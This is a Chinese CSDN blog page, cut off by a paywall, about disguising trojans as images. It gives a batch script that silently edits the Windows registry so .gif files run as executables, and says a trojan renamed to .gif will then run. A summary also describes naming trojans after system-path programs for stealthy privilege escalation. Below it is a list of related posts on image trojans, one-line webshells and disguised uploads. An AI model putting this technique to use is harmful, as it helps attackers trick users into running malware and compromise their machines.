php木马伪装成图片,木马伪装图片运行的技巧

最新推荐文章于 2021-04-01 20:09:10 发布

weixin_39916681

最新推荐文章于 2021-04-01 20:09:10 发布

阅读量1.6k

点赞数

文章标签： php木马伪装成图片

本文介绍了一种技巧，通过修改注册表使得.gif等常见图片格式能够被视为可执行文件，从而实现木马的伪装运行。此外，还讨论了利用环境变量的策略，如将木马命名为系统路径中已存在的程序名，达到隐蔽提权的目的。

摘要由CSDN通过智能技术生成

任意文件当做木马来运行

你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗？一个小技巧可以把任意后缀文件当做EXE程序文件来运行。

更改exe为gif：

@echo off

color 1A

ECHO Windows Registry Editor Version 5.00>gif.reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg

ECHO "Content Type"="application/x-msdownload">>gif.reg

ECHO @="exefile">>gif.reg

regedit /s gif.reg>nul 2>nul

del /s gif.reg>nul 2>nul

这个代码保存成.BAT的文件。

先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行

当然我们的木马后缀要换成.GIF 的，嘻嘻。

J-Wphc!m

恢复gif默认：

@echo off

color 1A

ECHO Windows Registry Editor Version 5.00>gif.reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg

ECHO "Content Type"="image/gif">>gif.reg

ECHO @="giffile">

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_39916681

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探

杨秀璋的专栏

11-12

3万+

这是作者的系列网络安全自学教程，主要是关于网安工具和实践操作的在线笔记，特分享出来与博友共勉，希望您们喜欢，一起进步。前文分享了分享机器学习在安全领域的应用，并复现一个基于机器学习（逻辑回归）的恶意请求识别。这篇文章简单叙述了Web安全学习路线，并实现了最简单的木马和病毒代码，希望对读者有所帮助。

做一个图片马（图片木马）的四种方法小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码

最新发布

qq_48368964的博客

07-28

2075

图片马:就是在图片中隐藏一句话木马。利用.htaccess等。

参与评论您还未登录，请先登录后发表或查看评论

php伪装图片,案例分析之PHP文件上传时，如何识别文件伪装？

weixin_26882891的博客

03-10

762

本帖最后由 huawei 于 2017-3-5 10:35 编辑文件上传之识别文件伪装PHP学院教学总监孙静在web开发过程中文件上传是不可绕过的话题，上传文件的时候需要验证上传的文件是否合法。通常情况下使用文件扩展名和文件类型来验证是不能识别文件伪装的，我们需要使用php_fileinfo.dll扩展来识别文件伪装。我们来测试一下，首先准备好文件上传的表单：[HTML] 纯文本查看复制...

php伪装文件名_攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)...

weixin_42510805的博客

03-08

279

在US BlackHat 2018大会上，安全人员证明，攻击者不仅可以利用PHAR包发动RCE攻击，而且，通过调整其二进制内容，他们还可以将其伪装成一幅图像，从而绕过安全检查。在本文中，我们来看看第二点是如何做到的。背景知识在US BlackHat 2018大会期间，Sam Thomas召开了一个关于在PHP中利用 phar:// 流包装器来实现针对服务器的代码执行攻击的研讨会( 幻灯片)。在运行...

php伪装文件名_PHP识别文件伪装（文件上传）

weixin_31698627的博客

03-08

461

问题：文件上传时候需要验证上传的文件是否合法，文件伪装如何识别？一个简单测试：把txt文件后缀直接改成jpg;上传 test Send this file: 1.通过$_FILES['userfile']['type']；获取文...

php伪装图片,GIF 图片伪装技术

weixin_29847829的博客

03-10

883

GIF89a图形文件是根据图形交换格式(GIF)89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行)，但在Web上所见到的大多数图形都是以89a版的格式创建的。89a版的一个最主要的优势就是可以创建动态图像，例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是，一个动态GIF是一个以GIF89a格式存储的文件，在一个这样...

php伪装来路,解析php下载远程图片函数可伪造来路

weixin_42553471的博客

03-10

167

本篇文章是对php中的下载远程图片函数进行了详细的分析介绍，需要的朋友参考下gurl 要下载的图片地址$rfurl 来路。如果目标图像做了防盗链设置，可以绕过。$filename 下载图片保存的文件名，相对路径，不要用realpath$gcookie 调整cookie 伪造的cookie$JumpCount 跳转计数$maxtime 最大次数调用方法：DownImageKeep(“http://w...

msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...

weixin_36005427的博客

03-27

1945

大马：代码量大，体积大，可以和一句话木马配合使用(先传一句话后传大马)，一般同意被发现，可变形或伪装(编码、远程接入)，主要功能：文件管理、，命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用：Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...

中国菜刀php一句话,中国菜刀之写一句话木马变形

weixin_39879674的博客

04-01

892

了解一句话脚本的工作原理一句话脚本的工作原理：一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句，(不仅仅是以asp为后缀的数据库文件)，该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...

PHP检测本地图片是否有木马

04-20

也可以用linux服务器上的木马扫描软件，比如 Clamav 支持命令行执行的，上传之后就扫一下，最可靠， $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );

JPG图片伪装器，任意文件伪装为图片

05-27

快速将想隐藏的任意文件（需要先压缩为RAR格式）伪装成JPG图片文件

是否中木马后门

02-12

木马（Trojan）是一种恶意软件，它伪装成合法的软件，诱骗用户下载和安装。一旦激活，木马可以为攻击者提供未经授权的访问权限，盗取敏感信息，或者控制用户的设备。而后门（Backdoor）则是指攻击者在系统中预留的一...

伪装成图片的php脚本,[翻译]如何将 PHP Phar 包转化成图像以绕过文件类型检测

weixin_35486751的博客

03-17

601

2018年的美国黑帽大会表明可以从PHAR包中获取RCE，并且可通过调整其二进制内容，将其伪装成完整的有效图像，从而绕过安全检查。接下来就让我们一起看看这是如何做到的吧。背景在2018年的美国黑帽大会期间，Sam Thomas召开了一个关于利用PHP中的Far://流包装器在服务器上执行代码的会议(幻灯片在此)。在执行PHAR包时，PHP会将其内容反序列化，允许攻击者启动PHP对象包含链。最有趣的...

php一句话图片木马怎么运行,php型一句话木马怎么写

weixin_30231153的博客

03-10

1726

php型一句话木马怎么写？PHP一句话木马一：关于PHP的一句话木马：

php伪装成图片上传再访问,PHP 文件上传之如何识别文件伪装？——PHP的fileinfo扩展可！...

weixin_30376865的博客

03-28

202

问题：文件上传时候需要验证上传的文件是否合法，文件伪装如何识别？一个简单测试：把txt文件后缀直接改成jpg;上传testSend this file: 1.通过$_FILES['userfile']['type']；获取文件后缀名；$data = $_FILES['userfile'];var_dump($data);/**结果**//*array(5) {["name"]=>string...

[远程控制]木马伪装：图片

不忘初心，护天下安全！

07-28

4269

前言坦言道，自己在最近的渗透之路碰了很多次壁，钓鱼大神们让我羡慕不已。而钓鱼的弹药里面必不可少的就是木马了，最近都在流行快捷方式马（lnk马），这次就不多介绍，从最简单的图片马伪装给大家介绍。伪装，改变不了被杀，只是改改面目而已。友情提醒，如果不会免杀，那就只是徒增笑资罢了。伪装进行时这次介绍的工具为BD2 Net Injector，百度下载即可，要注意后门哈。首先，我们准备如下：准备好的可执行文件（核心文件）；确定伪装的后缀；用于伪装的图片；图片未打开时的缩略ico文件

把php文件伪装成jpg上传,php 文件上传代码(限制jpg文件)

weixin_29682503的博客

03-10

511

/* 图片上传类仅限JPG格式图片 */class uploadFile{var $inputName; //input名称var $fileName; //文件命名var $fileProperty; //文件属性var $fileSize=2097152; //文件大小限制,2Mvar $filePath="upload/"; //文件存储路径function uploadFile($in...

一句话木马文件上传漏洞

07-20

一句话木马文件上传漏洞，通常发生在网站的文件上传功能中，攻击者可以利用这个漏洞上传恶意脚本（如PHP、JavaScript或HTML等），伪装成普通用户提交的正常文件。当其他用户或系统访问包含这种恶意脚本的文件时，...